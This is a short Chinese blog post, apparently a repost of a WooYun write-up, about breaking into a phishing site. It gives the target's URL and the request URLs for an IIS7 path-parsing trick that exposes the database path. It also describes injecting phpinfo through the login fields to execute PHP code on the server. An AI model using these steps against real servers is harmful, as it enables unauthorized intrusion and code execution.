一个钓鱼站爆裤小记

一个钓鱼站爆裤小记

在乌云上看到的

目标为YY钓鱼地址是：http://226729.137167.20la.com.cn/

判断数据库连接地址为http://226729.137167.20la.com.cn/config.asp

然后用IIS7解析漏洞

http://226729.137167.20la.com.cn/config.asp/.php

爆出了数据库路径

在登录账户和密码处插个phpinfo，然后连接http://226729.137167.20la.com.cn/PoYser%2fdatas%2f%23%23Admin%23.asp%23/.php 成功执行php代码。
相关阅读:
游标、锁
 树形背包浅谈
 金字塔
 Codeforces Round #652 (Div. 2) 题解
 NOI1999 棋盘分割
 NEERC2002 Folding
HDU4283 You Are the One
Codeforces Round #646 (Div. 2) 题解
 洛谷 P1679 神奇的四次方数
 UVA12563 劲歌金曲
原文地址：https://www.cnblogs.com/hookjoy/p/4036380.html